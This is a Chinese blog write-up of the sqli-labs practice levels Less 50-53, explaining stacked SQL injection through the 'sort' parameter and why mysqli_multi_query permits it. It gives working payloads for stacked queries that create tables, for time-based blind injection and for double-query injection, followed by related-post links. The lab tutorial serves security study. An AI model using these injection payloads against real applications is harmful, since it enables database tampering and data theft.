Less 50-53

最新推荐文章于 2021-12-28 22:33:12 发布
最新推荐文章于 2021-12-28 22:33:12 发布
阅读量172 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107712601
版权

文章目录

1. 题目分析

Less50-53这四关是第三部分的最后一个考察点。考察的主要知识为堆叠注入。这四关十分的相近(对于堆叠注入而言,仅仅是是否需要引号的问题),因此,放在一起讨论。

通过?sort=1' --+以及?sort=1 and sleep(0.5) --+可以判断出来,本关用报错信息的输出,以及sort为数值类型。

因此,应该可以使用双注入、时间注入;根据题目的要求,还可以使用堆叠注入。

2. 注入过程

2.1 堆叠注入

我们要注意,这里源码使用的查询SQL函数是mysqli_multi_query
mysqli_multi_query : 可以执行多个SQL语句。
mysqli_query() : 之能执行一个SQL语句。

因此,可能会存在堆叠注入的漏洞。

给出一条payload

?sort=1; create table test99 like users --+

在这里插入图片描述

2.2 时间注入

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(0.5),1) --+

通过上述语句,可得出可以进行时间注入。

2.3 双注入

经过测试双注入没有按照预期的给出结果:

?sort=1 and (select count(*) from information_schema.tables group by(concat(0x7e, (select database()), floor(rand(0)*2)))) --+

在这里插入图片描述
因此,双注入可能不行。

Less 51-53

51-53基本一样,在这里总结一下:

Less51: sort为单引号包裹。
payload

?sort=1%27; create table test99 like users --+

Less52: sort为数值型,但是屏蔽掉了报错信息
payload

?sort=1; create table test00 like users --+

Less53: sort为单引号包裹,但是屏蔽掉了报错信息。
payload

?sort=1%27; create table test00 like users --+
老司机开代码
关注
专栏目录
【愚公系列】2023年05月 Web渗透测试之SQL注入(sqli-labs、Less-46-53
时光隧道
08-04 4万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。宽字节注入是一种Web应用程序漏洞攻击技术,它利用对应用程序输入数据的不同编码方式,例如Unicode和UTF-8,来欺骗应用程序执行意外的操作。
sqli-labs Less-8
qq_42630215的博客
03-13 1392
Less-8 Get - Blind -Boolian Based -Single Quotes 1.原页面 2.?id=1 3.?id=1’ 4.尝试布尔盲注 代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,我们可以通过构造语句,来判断数据库信息的正确性,再通过页面的“真”和“假”来识别我们判断的是否正确 ?id=1’ and (length(database()))&gt...
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
m0_54899775的博客
12-28 713
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
Sqli-labs less 50
weixin_34167819的博客
08-11 497
Less-50 从本关开始我们开始进行order by stacked injection! 执行sql语句我们这里使用的是mysqli_multi_query()函数,而之前我们使用的是mysqli_query(),区别在于mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,那么我们此处就可以执行多个sql语句进行注入,也就是...
less-46-47-48-49-50-51-52-53
qq_44598397的博客
04-12 684
LESS-46 1、order by的原理为排序,所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序(ASC 代表结果会以由小往大的顺序列出,而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话,那我们就会用 ASC。) 输入?Sort=1 desc 输入:?Sort=1 asc 两者不同说明这里使用了order by 1、报错注入 输入:http://127...
Sqli-labs之Less:50-53
m0_46315342的博客
06-04 250
                                          &nbs...
Less
weixin_43718291的博客
02-21 471
一、 css预编译 常见的css预编译器有三种:less 、 sass 、 stylus。 Bootstrop使用的是less。 在线编译 http://tools.jb51.net/code/less2css 二、 Less Less是一门css预处理语言,他扩展了css语言,增加了变量、Mixin、函数等特性,使css更容易维护和扩展。他不是一个直接使用的语言,而是一个生成css的语言。Les...
less
weixin_57218747的博客
05-12 714
less的使用 主流的 CSS 预处理器 Less 官网:http://lesscss.org 中文 :https://less.bootcss.com/ Sass 官网:http://sass-lang.com Stylus 官网:http://learnboost.github.com/stylus 一 less编译 1 CSS预处理语言 less不能够支持得到浏览器的支持,需要将其进行转换。 less sass:都是css预处理器-》语言,为开发者提供的一个CSS解决方案。
sqli-labs学习笔记(十三)less 46-53 order by 后的注入
闵行小鱼塘
09-20 1079
继续学习sqli-labs,本篇是less 46-53
T-LESS: An RGB-D Dataset for 6D Pose Estimation of Texture-less Objects
rockray21的博客
10-11 2322
T-LESS: An RGB-D Dataset for 6D Pose Estimation of Texture-less Objects如有错误,欢迎指正摘要3. The T-LESS Dataset 如有错误,欢迎指正 本文翻译为机翻,仅作初步了解学习使用,需要用到的时候再回来整理。 如有侵权,请私信本人。 原文链接: https://arxiv.org/pdf/1701.05498.pdf 参考链接: 摘要 3. The T-LESS Dataset ...
SQLi-Labs 学习笔记(Less 41-50
Onlyme的博客
03-11 1285
点击打开链接Less-41 基于错误的POST型单引号字符型注入①先打开网页查看 Welcome Dhakkan与之前讲的Less-40的区别:[plain] view plain copy$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,构建payload:[plain]...
Less 18 (请求头注入--user-agent注入)
老司机开代码的博客
08-03 2518
文章目录1. 题目分析2. 构造SQL3. 注入过程4. 使用python进行注入 1. 题目分析 首先我们来分析一下题目: 经过尝试,我们知道,当我们输入正确的用户名和密码的时候,后台会将User Agent返回到屏幕上。 那么根据目前的情况来看,可能存在的注入点有2个: 登录框 user-agent 我们先来看一下源代码: // uagent的接收是未经过严格过滤的 $uagent = $_SERVER['HTTP_USER_AGENT']; $IP = $_SERVER['REMOTE_ADDR
Less 5-6(双注入)
老司机开代码的博客
08-03 1986
文章目录1. Less-51.1 问题描述1.2 解法一:双注入破解1.2.1 双注入的过程1.2.2 双注入的原理(floor报错的原因)1. rand()生产随机数的原理2. floor(rand())如何分组1.3 解法二:布尔盲注2. Less-63. 小结 1. Less-5 1.1 问题描述 首先我们看一下题目 意思是考察SQL注入的双注入。 这里涉及到了一个关键的知识点,利用cou...
Less19 (referer注入)
老司机开代码的博客
08-03 1786
文章目录1. 什么是referer?2. 分析题目3. 手工注入4. SQLmap注入 1. 什么是referer? 简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。 之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。 HTTP请求头中的referer字段 2. 分析题目 这关的思路和Less-8几乎是一样的。首先看一下网站源码: $sql="SELECT users.username, user
Less-8(盲注--布尔盲注)
老司机开代码的博客
08-03 1255
文章目录布尔盲注1. 关卡分析2. 盲注思路3. 编写工具进行通关 布尔盲注 在前面的练习中,也涉及到了布尔盲注的解题过程,思路都是一样的。自己构造判断语句强制页面进行判断并根据返回结果查看判断的正确性。 1. 关卡分析 本次的关卡是less-8,首先我们来分析一下这个页面。通过多次的尝试我们发现,如果输入的是true,那么就会返回一个You are in......,而如果是false,则不会返...
Less-7(文件读写操作)
老司机开代码的博客
08-03 1148
文章目录OUTFILE注入实战1. 关卡分析2. 过关斩将2.1 `secure_file_priv`2.2 注入过程 OUTFILE注入 在前面的学习中,我们知道了sql注入中的盲注和双注入是个什么鬼。今天,我门又解锁了一个新的姿势----outfile。 那么outfile是干什么的呢? 简单讲就是将一句话木马通过outfile传入网站目录,然后连上去;然后你就能为所欲为了(理想情况下)。 实...
Less 24(二次注入)
老司机开代码的博客
08-04 968
文章目录前言1. 二次注入的原理1.1 个人理解1.2 Example2. 题目分析2.1 主页2.2 注册页面2.3 登录成功界面(修改密码)3. 注入过程首先看一下数据库中原本的用户信息: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200711191827350.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubm
Less 17 (updatexml注入)
老司机开代码的博客
08-03 760
文章目录题意分析updatexml解析实战 题意分析 通过简单的测试,我们可以知道,这个页面的功能就是更改你所输入的username的password。(就是改密码)通过看源码,我们可以知道,此页面对于username字段有很严格的过滤。因此我们将注入的重点放在password上。同时我们一定要保证输入的用户名一定要是正确的,否则只会返回错误页面。 通过上面这个测试,我们得到了一条报错信息: You have an error in your SQL syntax; check the manual th
[[7080393202758320385,"RB01Ps012306300001","C","2023-06-30T11:54:46","730940","2023-06-30T11:54:46","2023-06-30T11:54:46","",738414,715950,"2023-06-30T00:00:00",268.0000000000,268.0000000000,737827,"EQLZ 1100","23FQ11084410",0,10101,10101,0,1.0000000000,1.0000000000,268.0000000000,268.0000000000,100.0000000000,0.0,"0"],[7080393733975310593,"RB01Ps012306300002","C","2023-06-30T11:56:53","730940","2023-06-30T11:56:53","2023-06-30T11:56:53","",738414,715950,"2023-06-30T00:00:00",-268.0000000000,-268.0000000000,737827,"EQLZ 1100","23FQ11084410",0,10101,10101,0,-1.0000000000,-1.0000000000,-268.0000000000,-268.0000000000,100.0000000000,0.0,"0"],[7080751531783356673,"RB01Ps012307010001","C","2023-07-01T11:38:39","730940","2023-07-01T11:38:39","2023-07-01T11:38:39","",738414,715950,"2023-07-01T00:00:00",388.0000000000,288.0000000000,735857,"EQUALIZER 官方 FAULT LESS低帮\"无鞋带\" \"一脚蹬\"反硫化错版鞋 原创帆布鞋板鞋男女运动艹 无中生有","22FSFSL00405",0,10101,10101,0,1.0000000000,1.0000000000,388.0000000000,288.0000000000,74.2268040000,0.0,"0"],[7080756229642912001,"RB01Ps012307010002","C","2023-07-01T11:57:19","730940","2023-07-01T11:57:19","2023-07-01T11:57:19","",738414,715950,"2023-07-01T00:00:00",328.0000000000,328.0000000000,737124,"EQLZ 梭织长裤","23ASLPNW401BL00",0,10101,10101,0,1.0000000000,1.0000000000,328.0000000000,328.0000000000,100.0000000000,0.0,"0"],[7080771963471266049,"RB01Ps012307010003","C","2023-07-01T12:59:50","730940","2023-07-01T12:59:50","2023-07-01T12:59:50","",738414,715950,"2023-07-01T00:00:00",604.0000000000,604.0000000000,737044,"EQLZ 针织复古窄肩背心","23ASJS0KK04OXS0",0,10101,10101,0,1.0000000000,1.0000000000,168.0000000000,168.0000000000,100.0000000000,0.0,"0"],[7080771963471266049,"RB01Ps012307010003","C","2023-07-01T12:59:50","730940","2023-07-01T12:59:50","2023-07-01T12:59:50","",738414,715950,"2023-07-01T00:00:00",604.0000000000,604.0000000000,737041,"EQLZ 针织复古窄肩背心","23ASJS0KK04OM00",0,10101,10101,0,1.0000000000,1.0000000000,168.0000000000,168.0000000000,100.0000000000,0.0,"0"],[7080771963471266049,"RB01Ps012307010003","C","2023-07-01T12:59:50","730940","2023-07-01T12:59:50","2023-07-01T12:59:50","",738414,715950,"2023-07-01T00:00:00",604.0000000000,604.0000000000,737753,"EQLZ 1100","23FQ11010420",0,10101,10101,0,1.0000000000,1.0000000000,268.0000000000,268.0000000000,100.0000000000,0.0,"0"]]通过gson().fromjson转换成对象
最新发布
07-14
\"2023-06-30T11:56:53\",\"730940\",\"2023-06-30T11:56:53\",\"2023-06-30T11:56:53\",\"\",738414,715950,\"2023-06-30T00:00:00\",-268.0000000000,-268.0000000000,737827,\"EQLZ 1100\",\"23FQ11084410\",0,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值